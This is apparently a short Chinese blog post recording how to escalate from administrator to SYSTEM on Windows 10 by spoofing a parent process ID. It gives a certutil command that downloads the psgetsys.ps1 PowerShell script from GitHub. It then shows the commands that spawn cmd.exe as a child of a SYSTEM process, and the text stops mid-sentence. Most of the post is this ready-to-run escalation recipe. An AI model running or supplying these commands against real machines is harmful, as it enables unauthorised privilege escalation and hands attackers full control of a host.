win10从administrator提权到system(更改父进程的pid)
前言看到一篇博客讲的一个powershell脚本,下载利用后确实可以成功,特作记录。实现脚本下载certutil -urlcache -split -f https://raw.githubusercontent.com/decoder-it/psgetsystem/master/psgetsys.ps1在windows下启动一个administrator权限的powershell. .\psge
·
前言
看到一篇博客讲的一个powershell脚本,下载利用后确实可以成功,特作记录。
实现
- 脚本下载
certutil -urlcache -split -f https://raw.githubusercontent.com/decoder-it/psgetsystem/master/psgetsys.ps1 - 在windows下启动一个administrator权限的powershell
. .\psgetsys.ps1
[MyProcess]::CreateProcessFromParent(648,"c:\windows\system32\cmd.exe","")
一般情况下将上面命令中的648改为任意一个system权限的进程的pid即可,例如:
查考文章
讨论HarmonyOS开发技术,专注于API与组件、DevEco Studio、测试、元服务和应用上架分发等。
更多推荐
5
0- 0
已为社区贡献2条内容
所有评论(0)